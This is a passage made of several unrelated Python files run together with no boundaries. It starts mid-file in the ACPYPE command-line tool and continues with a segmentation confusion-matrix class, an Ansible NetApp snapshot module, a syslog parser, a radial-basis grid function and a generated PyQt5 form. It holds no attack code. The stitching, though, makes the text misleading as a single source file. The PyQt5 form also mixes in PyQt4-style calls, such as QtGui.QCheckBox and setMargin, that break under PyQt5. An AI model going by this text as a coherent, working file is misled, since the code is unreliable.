parser.add_argument( "-e", "--engine", choices=["tleap", "sleap"], action="store", default="tleap", dest="engine", help="engine: tleap (default) or sleap (not fully matured)", ) parser.add_argument( "-s", "--max_time", type=int, action="store", default=MAXTIME, dest="max_time", help="max time (in sec) tolerance for sqm/mopac, default is %i hours" % (MAXTIME // 3600), ) parser.add_argument( "-y", "--ipython", action="store_true", dest="ipython", help="start iPython interpreter", ) parser.add_argument( "-w", "--verboseless", action="store_false", default=True, dest="verboseless", help="print nothing", ) parser.add_argument( "-g", "--disambiguate", action="store_true", dest="disambiguate", help="disambiguate lower and uppercase atomtypes in GMX top file", ) parser.add_argument( "-u", "--direct", action="store_true", dest="direct", help="for 'amb2gmx' mode, does a direct conversion, for any solvent", ) parser.add_argument( "-l", "--sorted", action="store_true", dest="sorted", help="sort atoms for GMX ordering", ) parser.add_argument( "-j", "--chiral", action="store_true", dest="chiral", help="create improper dihedral parameters for chiral atoms in CNS", ) args = parser.parse_args() at0 = time.time() print(header) amb2gmxF = False # if args.chiral: # args.cnstop = True if not args.input: amb2gmxF = True if not args.inpcrd or not args.prmtop: parser.error("missing input files") elif args.inpcrd or args.prmtop: parser.error("either '-i' or ('-p', '-x'), but not both") if args.debug: texta = "Python Version %s" % sys.version print("DEBUG: %s" % while_replace(texta)) if args.direct and not amb2gmxF: parser.error("option -u is only meaningful in 'amb2gmx' mode") try: if amb2gmxF: print("Converting Amber input files to Gromacs ...") system = MolTopol( acFileXyz=args.inpcrd, acFileTop=args.prmtop, debug=args.debug, basename=args.basename, verbose=args.verboseless, gmx4=args.gmx4, disam=args.disambiguate, direct=args.direct, is_sorted=args.sorted, chiral=args.chiral, ) system.printDebug("prmtop and inpcrd files parsed") system.writeGromacsTopolFiles(amb2gmx=True) else: molecule = ACTopol( args.input, chargeType=args.charge_method, chargeVal=args.net_charge, debug=args.debug, multiplicity=args.multiplicity, atomType=args.atom_type, force=args.force, outTopol=args.outtop, engine=args.engine, allhdg=args.cnstop, basename=args.basename, timeTol=args.max_time, qprog=args.qprog, ekFlag='''"%s"''' % args.keyword, verbose=args.verboseless, gmx4=args.gmx4, disam=args.disambiguate, direct=args.direct, is_sorted=args.sorted, chiral=args.chiral, ) molecule.createACTopol() molecule.createMolTopol() acpypeFailed = False except Exception: _exceptionType, exceptionValue, exceptionTraceback = sys.exc_info() print("ACPYPE FAILED: %s" % exceptionValue) if args.debug: traceback.print_tb(exceptionTraceback, file=sys.stdout) acpypeFailed = True execTime = int(round(time.time() - at0)) if execTime == 0: amsg = "less than a second" else: amsg = elapsedTime(execTime) print("Total time of execution: %s" % amsg) if args.ipython: import IPython # pylint: disable=import-outside-toplevel IPython.embed() try: rmtree(molecule.tmpDir) except Exception: pass if acpypeFailed: sys.exit(19) try: os.chdir(molecule.rootDir) except Exception: pass if __name__ == "__main__": # For pip package # LOCAL_PATH = os.getcwd() # os.environ["PATH"] += ( # os.pathsep # + LOCAL_PATH # + "amber19-0_linux/bin/to_be_dispatched:" # + LOCAL_PATH # + "/amber19-0_linux/bin:" # + LOCAL_PATH # + "/amber19-0_linux/dat/" # ) # os.environ["AMBERHOME"] = LOCAL_PATH +'/amber19-0_linux' # os.environ["ACHOME"] = LOCAL_PATH +'/amber19-0_linux/bin/' # os.environ["LD_LIBRARY_PATH"] =LOCAL_PATH +'/amber19-0_linux/lib' init_main() # necessary for to call in anaconda package;
import numpy as np import matplotlib.pyplot as plt import matplotlib as mpl class Confusion(object): '''Confusion matrix class including incremental confusion computation. Instances of this class can be used to compute the confusion matrix and other typical scores for semantic segmentation problems. Either incrementally or in one call. All labels should be positive integers. With the exception of a negative void label. Methods for plotting and printing are included. ''' def __init__(self, label_names, void_label=-1, label_count=None): '''Inits a Confusion matrix with label names and the void label. Parameters ---------- label_names : list of strings or None A list of all label names. The void label name should not be included void_label : int (default: -1) This label will be ignored. It has to be negative. label_count : int or None (default: None) If label_names is None, this will be used to define the shape of the confusion matrix. Raises ------ ValueError When both `label_names` and `label_count` is ``None``, or if `void_label` is positive, a `ValueError` is raised. ''' if label_names is not None: self.label_names = (np.array(label_names).copy()).tolist() else: if label_count is None: raise ValueError('Either label_names or label_count has to be ' 'specified.') else: self.label_names = [str(i) for i in range(label_count)] if void_label >= 0: raise ValueError('The void label needs to be a negative number.') else: self.void_label = void_label self.class_count= len(self.label_names) self.reset() def reset(self): '''Reset all values to allow for a fresh computation. ''' self.confusion = np.zeros((self.class_count,self.class_count), np.int64) self.confusion_normalized_row = None self.confusion_normalized_col = None self.global_score = 0 self.avg_score = 0 self.avg_iou_score = 0 self.finished_computation = False def finish(self): '''Computes all scores given the accumulated data. ''' total = np.sum(self.confusion) self.gt_sum_per_class = np.sum(self.confusion, 1) self.sum_per_class = np.sum(self.confusion, 0) self.global_score = np.sum(np.diag(self.confusion))/total diag = np.diag(self.confusion) union = self.gt_sum_per_class + self.sum_per_class - diag self.avg_score = np.nanmean(diag/self.gt_sum_per_class) self.avg_iou_score = np.nanmean(diag/union) self.confusion_normalized_row = ( self.confusion.copy().T/self.gt_sum_per_class.astype(np.float32)).T self.confusion_normalized_col = ( self.confusion.copy()/self.sum_per_class.astype(np.float32)) self.finished_computation = True def incremental_update(self, gt, pred, allow_void_prediction=False, update_finished=True): '''Update the confusion matrix with the provided data. Given the ground truth and predictions the stored confusion matrix is updated. If all scores have been computed before they become invalid after this operation and need to be recomputed. Updates can be done with a single image, a batch, or the complete dataset at once. gt : np.ndarray The ground truth image(s). Either a single image (WxH) or a tensor of several images (BxWxH). pred : np.ndarray The prediction image(s). Either a single image (WxH) or a tensor of several images (BxWxH). Needs the same shape as gt. allow_void_prediction : bool (default: False) Specifies if void predictions are allowed or not. Typically this is not desired and an exception is raised when predictions have void labels. When set to True, these labels are ignored during the computation. update_finished : bool (default: True) When set to False this method raise an exception if scores have been computed before. If left at True, nothing happens. Raises ------ ValueError When `gt` and `pred` don't have matching shapes, when the labels are too large, or when `pred` contains void labels and `allow_void_prediction` is set to False a `ValueError` is raised. Exception When `update_finished` is set to false and this method is called after the the scores have been computed an `Exception` is raised. ''' if gt.shape != pred.shape: raise ValueError('Groundtruth and prediction shape missmatch') if not allow_void_prediction and self.void_label in pred: raise ValueError('Void labels found in the predictions. Fix the ' 'predictions, or set `allow_void_prediction` to ' 'True.') if np.max(gt) >= self.class_count: raise ValueError('Labels in the groundturh exceed the class count.') if np.max(pred) >= self.class_count: raise ValueError('Labels in the prediction exceed the class count.') if self.finished_computation and not update_finished: raise Exception('You specified not to allow updates after computing' ' scores.') gt_flat = gt.flatten().astype(np.int32) pred_flat = pred.flatten().astype(np.int32) non_void = gt_flat != self.void_label if allow_void_prediction: non_void *= pred_flat != self.void_label gt_flat = gt_flat[non_void] pred_flat = pred_flat[non_void] pairs = gt_flat*self.class_count + pred_flat pairs, pair_counts = np.unique(pairs, return_counts=True) self.confusion.flat[pairs] += pair_counts self.finished_computation = False def plot(self, colormap=None, number_format=None, only_return_fig=False): '''Create and plot a figure summarizing all information. colormap : mpl.cm (default: None) The colormap used to colorize the matrices. None results in mpl default to be used. number_format : string or None (default: None) The format used to print percentages into the confusion matrix. When not provided the numbers are not printed. For example `{0:>7.2%}`. only_return_fig : bool (default: False) When set to true the figure is only returned. For example for saving the figure or when using this outside of jupyter notebooks. ''' #Compute the values in case this has not been done yet. if not self.finished_computation: self.finish() #Setup the plots fig, ax = plt.subplots(1,2, figsize=(15,5.5), sharey=True, sharex=True) #Show the confusion matrices ax[0].imshow(self.confusion_normalized_row*100, interpolation='nearest', cmap=colormap, vmin=0, vmax=100, aspect='auto') im = ax[1].imshow( self.confusion_normalized_col*100, interpolation='nearest', cmap=colormap, vmin=0, vmax=100, aspect='auto') #Make a colorbar cax,kw = mpl.colorbar.make_axes([a for a in ax.flat]) plt.colorbar(im, cax=cax, **kw) ax[0].set_yticks(range(self.class_count)) ax[0].set_xticks(range(self.class_count)) #Possibly add the numbers if number_format is not None: for r in range(0,self.class_count): for c in range(0,self.class_count): ax[0].text(c, r, number_format.format( self.confusion_normalized_row[r,c]), horizontalalignment='center', verticalalignment='center', fontsize=10) ax[1].text(c, r, number_format.format( self.confusion_normalized_col[r,c]), horizontalalignment='center', verticalalignment='center', fontsize=10) # Add the names ax[0].set_yticklabels(self.label_names) ax[0].xaxis.tick_top() ax[0].set_xticklabels(self.label_names, rotation='vertical') ax[1].xaxis.tick_top() ax[1].set_xticklabels(self.label_names, rotation='vertical') # Labels for Row vs Column normalized ax[0].set_title('Row normalized', horizontalalignment='center', y=-0.1) ax[1].set_title( 'Column normalized', horizontalalignment='center', y=-0.1) # A final line showing our three favorite scores. fig.suptitle('Global:{0:.2%}, Average:{1:.2%}, IoU:{2:.2%}'.format( self.global_score, self.avg_score, self.avg_iou_score), fontsize=14, fontweight='bold', x = 0.4, y = 0.03) if only_return_fig: plt.close() return fig def print_confusion_matrix(self, max_name_length=None): '''Print the row normalized confusion matrix in a human readable form. Parameters ---------- max_name_length : int or None (default:None) The maximum number of characters printed for the class names. If left as None the longest class name defines this value. ''' if max_name_length is None: max_name_length = np.max([len(n) for n in self.label_names]) label_names_cropped = [n[:max_name_length] for n in self.label_names] #Compute the values in case this has not been done yet. if not self.finished_computation: self.finish() line = ('{:>' + str(max_name_length) + 's}, ' + ', '.join(['{:>7.2%}'] * self.class_count)) for l, conf in zip(label_names_cropped, self.confusion_normalized_row): print(line.format(l, *(conf.tolist()))) print('Global: {:>7.2%}'.format(self.global_score)) print('Average: {:>7.2%}'.format(self.avg_score)) print('IoU: {:>7.2%}'.format(self.avg_iou_score))
#!/usr/bin/python # (c) 2016, NetApp, Inc # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # ANSIBLE_METADATA = {'status': ['preview'], 'supported_by': 'community', 'version': '1.0'} DOCUMENTATION = """ --- module: netapp_e_snapshot_images short_description: Create and delete snapshot images description: - Create and delete snapshots images on snapshot groups for NetApp E-series storage arrays. - Only the oldest snapshot image can be deleted so consistency is preserved. - "Related: Snapshot volumes are created from snapshot images." version_added: '2.2' author: Kevin Hulquest (@hulquest) options: api_username: required: true description: - The username to authenticate with the SANtricity WebServices Proxy or embedded REST API. api_password: required: true description: - The password to authenticate with the SANtricity WebServices Proxy or embedded REST API. api_url: required: true description: - The url to the SANtricity WebServices Proxy or embedded REST API. validate_certs: required: false default: true description: - Should https certificates be validated? snapshot_group: description: - The name of the snapshot group in which you want to create a snapshot image. required: True state: description: - Whether a new snapshot image should be created or oldest be deleted. required: True choices: ['create', 'remove'] """ EXAMPLES = """ - name: Create Snapshot netapp_e_snapshot_images: ssid: "{{ ssid }}" api_url: "{{ netapp_api_url }}" api_username: "{{ netapp_api_username }}" api_password: "{{ netapp_api_password }}" validate_certs: "{{ validate_certs }}" snapshot_group: "3300000060080E5000299C24000005B656D9F394" state: 'create' """ RETURN = """ --- changed: true msg: "Created snapshot image" image_id: "3400000060080E5000299B640063074057BC5C5E " """ HEADERS = { "Content-Type": "application/json", "Accept": "application/json", } import json from ansible.module_utils.api import basic_auth_argument_spec from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.pycompat24 import get_exception from ansible.module_utils.urls import open_url from ansible.module_utils.six.moves.urllib.error import HTTPError def request(url, data=None, headers=None, method='GET', use_proxy=True, force=False, last_mod_time=None, timeout=10, validate_certs=True, url_username=None, url_password=None, http_agent=None, force_basic_auth=True, ignore_errors=False): try: r = open_url(url=url, data=data, headers=headers, method=method, use_proxy=use_proxy, force=force, last_mod_time=last_mod_time, timeout=timeout, validate_certs=validate_certs, url_username=url_username, url_password=url_password, http_agent=http_agent, force_basic_auth=force_basic_auth) except HTTPError: err = get_exception() r = err.fp try: raw_data = r.read() if raw_data: data = json.loads(raw_data) else: raw_data = None except: if ignore_errors: pass else: raise Exception(raw_data) resp_code = r.getcode() if resp_code >= 400 and not ignore_errors: raise Exception(resp_code, data) else: return resp_code, data def snapshot_group_from_name(module, ssid, api_url, api_pwd, api_usr, name): snap_groups = 'storage-systems/%s/snapshot-groups' % ssid snap_groups_url = api_url + snap_groups (ret, snapshot_groups) = request(snap_groups_url, url_username=api_usr, url_password=api_pwd, headers=HEADERS, validate_certs=module.params['validate_certs']) snapshot_group_id = None for snapshot_group in snapshot_groups: if name == snapshot_group['label']: snapshot_group_id = snapshot_group['pitGroupRef'] break if snapshot_group_id is None: module.fail_json(msg="Failed to lookup snapshot group. Group [%s]. Id [%s]." % (name, ssid)) return snapshot_group def oldest_image(module, ssid, api_url, api_pwd, api_usr, name): get_status = 'storage-systems/%s/snapshot-images' % ssid url = api_url + get_status try: (ret, images) = request(url, url_username=api_usr, url_password=api_pwd, headers=HEADERS, validate_certs=module.params['validate_certs']) except: err = get_exception() module.fail_json(msg="Failed to get snapshot images for group. Group [%s]. Id [%s]. Error [%s]" % (name, ssid, str(err))) if not images: module.exit_json(msg="There are no snapshot images to remove. Group [%s]. Id [%s]." % (name, ssid)) oldest = min(images, key=lambda x: x['pitSequenceNumber']) if oldest is None or "pitRef" not in oldest: module.fail_json(msg="Failed to lookup oldest snapshot group. Group [%s]. Id [%s]." % (name, ssid)) return oldest def create_image(module, ssid, api_url, pwd, user, p, snapshot_group): snapshot_group_obj = snapshot_group_from_name(module, ssid, api_url, pwd, user, snapshot_group) snapshot_group_id = snapshot_group_obj['pitGroupRef'] endpoint = 'storage-systems/%s/snapshot-images' % ssid url = api_url + endpoint post_data = json.dumps({'groupId': snapshot_group_id}) image_data = request(url, data=post_data, method='POST', url_username=user, url_password=pwd, headers=HEADERS, validate_certs=module.params['validate_certs']) if image_data[1]['status'] == 'optimal': status = True id = image_data[1]['id'] else: status = False id = '' return status, id def delete_image(module, ssid, api_url, pwd, user, snapshot_group): image = oldest_image(module, ssid, api_url, pwd, user, snapshot_group) image_id = image['pitRef'] endpoint = 'storage-systems/%s/snapshot-images/%s' % (ssid, image_id) url = api_url + endpoint try: (ret, image_data) = request(url, method='DELETE', url_username=user, url_password=pwd, headers=HEADERS, validate_certs=module.params['validate_certs']) except Exception: e = get_exception() image_data = (e[0], e[1]) if ret == 204: deleted_status = True error_message = '' else: deleted_status = False error_message = image_data[1]['errorMessage'] return deleted_status, error_message def main(): argument_spec = basic_auth_argument_spec() argument_spec.update(dict( snapshot_group=dict(required=True, type='str'), ssid=dict(required=True, type='str'), api_url=dict(required=True), api_username=dict(required=False), api_password=dict(required=False, no_log=True), validate_certs=dict(required=False, default=True), state=dict(required=True, choices=['create', 'remove'], type='str'), )) module = AnsibleModule(argument_spec) p = module.params ssid = p.pop('ssid') api_url = p.pop('api_url') user = p.pop('api_username') pwd = p.pop('api_password') snapshot_group = p.pop('snapshot_group') desired_state = p.pop('state') if not api_url.endswith('/'): api_url += '/' if desired_state == 'create': created_status, snapshot_id = create_image(module, ssid, api_url, pwd, user, p, snapshot_group) if created_status: module.exit_json(changed=True, msg='Created snapshot image', image_id=snapshot_id) else: module.fail_json( msg="Could not create snapshot image on system %s, in snapshot group %s" % (ssid, snapshot_group)) else: deleted, error_msg = delete_image(module, ssid, api_url, pwd, user, snapshot_group) if deleted: module.exit_json(changed=True, msg='Deleted snapshot image for snapshot group [%s]' % (snapshot_group)) else: module.fail_json( msg="Could not create snapshot image on system %s, in snapshot group %s --- %s" % ( ssid, snapshot_group, error_msg)) if __name__ == '__main__': main()
# Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import datetime import arrow import attr import attr.validators from pyparsing import Combine, Literal as L, Word from pyparsing import srange, restOfLine, printables from pyparsing import ParseException from . import Facility, Severity class UnparseableSyslogMessage(Exception): pass class NilValue: pass NilValue = NilValue() SP = L(" ").suppress() LANGLE = L("<").suppress() RANGLE = L(">").suppress() LBRACKET = L("[").suppress() RBRACKET = L("]").suppress() COLON = L(":").suppress() NIL = L("-") NIL.setName("Nil") NIL.setParseAction(lambda s, l, t: NilValue) PRIORITY = LANGLE + Word(srange("[0-9]"), min=1, max=3) + RANGLE # 191 Max PRIORITY = PRIORITY.setResultsName("priority") PRIORITY.setName("Priority") PRIORITY.setParseAction(lambda s, l, t: int(t[0])) TIMESTAMP = Word(printables) TIMESTAMP = TIMESTAMP.setResultsName("timestamp") TIMESTAMP.setName("Timestamp") HOSTNAME = NIL ^ Word(printables) HOSTNAME = HOSTNAME.setResultsName("hostname") HOSTNAME.setName("Hostname") APPNAME = Word("".join(set(printables) - {"["})) APPNAME = APPNAME.setResultsName("appname") APPNAME.setName("AppName") PROCID = Combine(LBRACKET + Word("".join(set(printables) - {"]"})) + RBRACKET) PROCID = PROCID.setResultsName("procid") PROCID.setName("ProcID") HEADER = PRIORITY + TIMESTAMP + SP + HOSTNAME + SP + APPNAME + PROCID MESSAGE = restOfLine.setResultsName("message") MESSAGE.setName("Message") SYSLOG_MESSAGE = HEADER + COLON + SP + MESSAGE SYSLOG_MESSAGE.leaveWhitespace() @attr.s(slots=True, frozen=True) class SyslogMessage: facility = attr.ib( type=Facility, converter=Facility, validator=attr.validators.in_(Facility) ) severity = attr.ib( type=Severity, converter=Severity, validator=attr.validators.in_(Severity) ) timestamp = attr.ib( type=datetime.datetime, converter=lambda t: arrow.get(t).naive, validator=attr.validators.instance_of(datetime.datetime), ) hostname = attr.ib( type=str, validator=attr.validators.instance_of((str, type(None))) ) appname = attr.ib(type=str, validator=attr.validators.instance_of(str)) procid = attr.ib(type=str, validator=attr.validators.instance_of(str)) message = attr.ib(type=str, validator=attr.validators.instance_of(str)) def _value_or_none(value): if value is NilValue: return None else: return value def parse(message): try: parsed = SYSLOG_MESSAGE.parseString(message, parseAll=True) except ParseException as exc: raise UnparseableSyslogMessage(str(exc)) from None data = {} data["facility"] = int(parsed.priority / 8) data["severity"] = parsed.priority - (data["facility"] * 8) data["timestamp"] = parsed.timestamp data["hostname"] = _value_or_none(parsed.hostname) data["appname"] = parsed.appname data["procid"] = parsed.procid data["message"] = parsed.message return SyslogMessage(**data)
import numpy as np def uniform_grid(n_centers, low, high): """ This function is used to create the parameters of uniformly spaced radial basis functions with 25% of overlap. It creates a uniformly spaced grid of ``n_centers[i]`` points in each ``ranges[i]``. Also returns a vector containing the appropriate scales of the radial basis functions. Args: n_centers (list): number of centers of each dimension; low (np.ndarray): lowest value for each dimension; high (np.ndarray): highest value for each dimension. Returns: The uniformly spaced grid and the scale vector. """ n_features = len(low) b = np.zeros(n_features) c = list() tot_points = 1 for i, n in enumerate(n_centers): start = low[i] end = high[i] b[i] = (end - start) ** 2 / n ** 3 m = abs(start - end) / n if n == 1: c_i = (start + end) / 2. c.append(np.array([c_i])) else: c_i = np.linspace(start - m * .1, end + m * .1, n) c.append(c_i) tot_points *= n n_rows = 1 n_cols = 0 grid = np.zeros((tot_points, n_features)) for discrete_values in c: i1 = 0 dim = len(discrete_values) for i in range(dim): for r in range(n_rows): idx_r = r + i * n_rows for c in range(n_cols): grid[idx_r, c] = grid[r, c] grid[idx_r, n_cols] = discrete_values[i1] i1 += 1 n_cols += 1 n_rows *= len(discrete_values) return grid, b
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file './pyqtgraph/graphicsItems/PlotItem/plotConfigTemplate.ui' # # Created: Wed Mar 26 15:09:28 2014 # by: PyQt5 UI code generator 5.0.1 # # WARNING! All changes made in this file will be lost! from PyQt5 import QtCore, QtGui, QtWidgets class Ui_Form(object): def setupUi(self, Form): Form.setObjectName("Form") Form.resize(481, 840) self.averageGroup = QtWidgets.QGroupBox(Form) self.averageGroup.setGeometry(QtCore.QRect(0, 640, 242, 182)) self.averageGroup.setCheckable(True) self.averageGroup.setChecked(False) self.averageGroup.setObjectName("averageGroup") self.gridLayout_5 = QtWidgets.QGridLayout(self.averageGroup) self.gridLayout_5.setContentsMargins(0, 0, 0, 0) self.gridLayout_5.setSpacing(0) self.gridLayout_5.setObjectName("gridLayout_5") self.avgParamList = QtWidgets.QListWidget(self.averageGroup) self.avgParamList.setObjectName("avgParamList") self.gridLayout_5.addWidget(self.avgParamList, 0, 0, 1, 1) self.decimateGroup = QtWidgets.QFrame(Form) self.decimateGroup.setGeometry(QtCore.QRect(10, 140, 191, 171)) self.decimateGroup.setObjectName("decimateGroup") self.gridLayout_4 = QtWidgets.QGridLayout(self.decimateGroup) self.gridLayout_4.setContentsMargins(0, 0, 0, 0) self.gridLayout_4.setSpacing(0) self.gridLayout_4.setObjectName("gridLayout_4") self.clipToViewCheck = QtWidgets.QCheckBox(self.decimateGroup) self.clipToViewCheck.setObjectName("clipToViewCheck") self.gridLayout_4.addWidget(self.clipToViewCheck, 7, 0, 1, 3) self.maxTracesCheck = QtWidgets.QCheckBox(self.decimateGroup) self.maxTracesCheck.setObjectName("maxTracesCheck") self.gridLayout_4.addWidget(self.maxTracesCheck, 8, 0, 1, 2) self.downsampleCheck = QtWidgets.QCheckBox(self.decimateGroup) self.downsampleCheck.setObjectName("downsampleCheck") self.gridLayout_4.addWidget(self.downsampleCheck, 0, 0, 1, 3) self.peakRadio = QtWidgets.QRadioButton(self.decimateGroup) self.peakRadio.setChecked(True) self.peakRadio.setObjectName("peakRadio") self.gridLayout_4.addWidget(self.peakRadio, 6, 1, 1, 2) self.maxTracesSpin = QtWidgets.QSpinBox(self.decimateGroup) self.maxTracesSpin.setObjectName("maxTracesSpin") self.gridLayout_4.addWidget(self.maxTracesSpin, 8, 2, 1, 1) self.forgetTracesCheck = QtWidgets.QCheckBox(self.decimateGroup) self.forgetTracesCheck.setObjectName("forgetTracesCheck") self.gridLayout_4.addWidget(self.forgetTracesCheck, 9, 0, 1, 3) self.meanRadio = QtWidgets.QRadioButton(self.decimateGroup) self.meanRadio.setObjectName("meanRadio") self.gridLayout_4.addWidget(self.meanRadio, 3, 1, 1, 2) self.subsampleRadio = QtWidgets.QRadioButton(self.decimateGroup) self.subsampleRadio.setObjectName("subsampleRadio") self.gridLayout_4.addWidget(self.subsampleRadio, 2, 1, 1, 2) self.autoDownsampleCheck = QtWidgets.QCheckBox(self.decimateGroup) self.autoDownsampleCheck.setChecked(True) self.autoDownsampleCheck.setObjectName("autoDownsampleCheck") self.gridLayout_4.addWidget(self.autoDownsampleCheck, 1, 2, 1, 1) spacerItem = QtWidgets.QSpacerItem(30, 20, QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Minimum) self.gridLayout_4.addItem(spacerItem, 2, 0, 1, 1) self.downsampleSpin = QtWidgets.QSpinBox(self.decimateGroup) self.downsampleSpin.setMinimum(1) self.downsampleSpin.setMaximum(100000) self.downsampleSpin.setProperty("value", 1) self.downsampleSpin.setObjectName("downsampleSpin") self.gridLayout_4.addWidget(self.downsampleSpin, 1, 1, 1, 1) self.transformGroup = QtWidgets.QFrame(Form) self.transformGroup.setGeometry(QtCore.QRect(10, 10, 171, 101)) self.transformGroup.setObjectName("transformGroup") self.gridLayout = QtWidgets.QGridLayout(self.transformGroup) self.gridLayout.setObjectName("gridLayout") self.gridLayout.setMargin(0) self.gridLayout.setSpacing(0) self.logXCheck = QtGui.QCheckBox(self.transformGroup) self.logXCheck.setObjectName("logXCheck") self.gridLayout.addWidget(self.logXCheck, 1, 0, 1, 1) self.fftCheck = QtGui.QCheckBox(self.transformGroup) self.fftCheck.setObjectName("fftCheck") self.gridLayout.addWidget(self.fftCheck, 0, 0, 1, 1) self.derivativeCheck = QtGui.QCheckBox(self.transformGroup) self.derivativeCheck.setObjectName("derivativeCheck") self.gridLayout.addWidget(self.derivativeCheck, 3, 0, 1, 1) self.phasemapCheck = QtGui.QCheckBox(self.transformGroup) self.phasemapCheck.setObjectName("phasemapCheck") self.gridLayout.addWidget(self.phasemapCheck, 4, 0, 1, 1) self.logYCheck = QtWidgets.QCheckBox(self.transformGroup) self.logYCheck.setObjectName("logYCheck") self.gridLayout.addWidget(self.logYCheck, 2, 0, 1, 1) self.pointsGroup = QtWidgets.QGroupBox(Form) self.pointsGroup.setGeometry(QtCore.QRect(10, 550, 234, 58)) self.pointsGroup.setCheckable(True) self.pointsGroup.setObjectName("pointsGroup") self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.pointsGroup) self.verticalLayout_5.setObjectName("verticalLayout_5") self.autoPointsCheck = QtWidgets.QCheckBox(self.pointsGroup) self.autoPointsCheck.setChecked(True) self.autoPointsCheck.setObjectName("autoPointsCheck") self.verticalLayout_5.addWidget(self.autoPointsCheck) self.gridGroup = QtWidgets.QFrame(Form) self.gridGroup.setGeometry(QtCore.QRect(10, 460, 221, 81)) self.gridGroup.setObjectName("gridGroup") self.gridLayout_2 = QtWidgets.QGridLayout(self.gridGroup) self.gridLayout_2.setObjectName("gridLayout_2") self.xGridCheck = QtWidgets.QCheckBox(self.gridGroup) self.xGridCheck.setObjectName("xGridCheck") self.gridLayout_2.addWidget(self.xGridCheck, 0, 0, 1, 2) self.yGridCheck = QtWidgets.QCheckBox(self.gridGroup) self.yGridCheck.setObjectName("yGridCheck") self.gridLayout_2.addWidget(self.yGridCheck, 1, 0, 1, 2) self.gridAlphaSlider = QtWidgets.QSlider(self.gridGroup) self.gridAlphaSlider.setMaximum(255) self.gridAlphaSlider.setProperty("value", 128) self.gridAlphaSlider.setOrientation(QtCore.Qt.Horizontal) self.gridAlphaSlider.setObjectName("gridAlphaSlider") self.gridLayout_2.addWidget(self.gridAlphaSlider, 2, 1, 1, 1) self.label = QtWidgets.QLabel(self.gridGroup) self.label.setObjectName("label") self.gridLayout_2.addWidget(self.label, 2, 0, 1, 1) self.alphaGroup = QtWidgets.QGroupBox(Form) self.alphaGroup.setGeometry(QtCore.QRect(10, 390, 234, 60)) self.alphaGroup.setCheckable(True) self.alphaGroup.setObjectName("alphaGroup") self.horizontalLayout = QtWidgets.QHBoxLayout(self.alphaGroup) self.horizontalLayout.setObjectName("horizontalLayout") self.autoAlphaCheck = QtWidgets.QCheckBox(self.alphaGroup) self.autoAlphaCheck.setChecked(False) self.autoAlphaCheck.setObjectName("autoAlphaCheck") self.horizontalLayout.addWidget(self.autoAlphaCheck) self.alphaSlider = QtWidgets.QSlider(self.alphaGroup) self.alphaSlider.setMaximum(1000) self.alphaSlider.setProperty("value", 1000) self.alphaSlider.setOrientation(QtCore.Qt.Horizontal) self.alphaSlider.setObjectName("alphaSlider") self.horizontalLayout.addWidget(self.alphaSlider) self.retranslateUi(Form) QtCore.QMetaObject.connectSlotsByName(Form) def retranslateUi(self, Form): _translate = QtCore.QCoreApplication.translate Form.setWindowTitle(_translate("Form", "PyQtGraph")) self.averageGroup.setToolTip(_translate("Form", "Display averages of the curves displayed in this plot. The parameter list allows you to choose parameters to average over (if any are available).")) self.averageGroup.setTitle(_translate("Form", "Average")) self.clipToViewCheck.setToolTip(_translate("Form", "Plot only the portion of each curve that is visible. This assumes X values are uniformly spaced.")) self.clipToViewCheck.setText(_translate("Form", "Clip to View")) self.maxTracesCheck.setToolTip(_translate("Form", "If multiple curves are displayed in this plot, check this box to limit the number of traces that are displayed.")) self.maxTracesCheck.setText(_translate("Form", "Max Traces:")) self.downsampleCheck.setText(_translate("Form", "Downsample")) self.peakRadio.setToolTip(_translate("Form", "Downsample by drawing a saw wave that follows the min and max of the original data. This method produces the best visual representation of the data but is slower.")) self.peakRadio.setText(_translate("Form", "Peak")) self.maxTracesSpin.setToolTip(_translate("Form", "If multiple curves are displayed in this plot, check \"Max Traces\" and set this value to limit the number of traces that are displayed.")) self.forgetTracesCheck.setToolTip(_translate("Form", "If MaxTraces is checked, remove curves from memory after they are hidden (saves memory, but traces can not be un-hidden).")) self.forgetTracesCheck.setText(_translate("Form", "Forget hidden traces")) self.meanRadio.setToolTip(_translate("Form", "Downsample by taking the mean of N samples.")) self.meanRadio.setText(_translate("Form", "Mean")) self.subsampleRadio.setToolTip(_translate("Form", "Downsample by taking the first of N samples. This method is fastest and least accurate.")) self.subsampleRadio.setText(_translate("Form", "Subsample")) self.autoDownsampleCheck.setToolTip(_translate("Form", "Automatically downsample data based on the visible range. This assumes X values are uniformly spaced.")) self.autoDownsampleCheck.setText(_translate("Form", "Auto")) self.downsampleSpin.setToolTip(_translate("Form", "Downsample data before plotting. (plot every Nth sample)")) self.downsampleSpin.setSuffix(_translate("Form", "x")) self.logXCheck.setText(_translate("Form", "Log X", None)) self.fftCheck.setText(_translate("Form", "Power Spectrum (FFT)", None)) self.derivativeCheck.setText(_translate("Form", "dy/dx", None)) self.phasemapCheck.setText(_translate("Form", "Y vs. Y\'", None)) self.logYCheck.setText(_translate("Form", "Log Y")) self.pointsGroup.setTitle(_translate("Form", "Points")) self.autoPointsCheck.setText(_translate("Form", "Auto")) self.xGridCheck.setText(_translate("Form", "Show X Grid")) self.yGridCheck.setText(_translate("Form", "Show Y Grid")) self.label.setText(_translate("Form", "Opacity")) self.alphaGroup.setTitle(_translate("Form", "Alpha")) self.autoAlphaCheck.setText(_translate("Form", "Auto"))
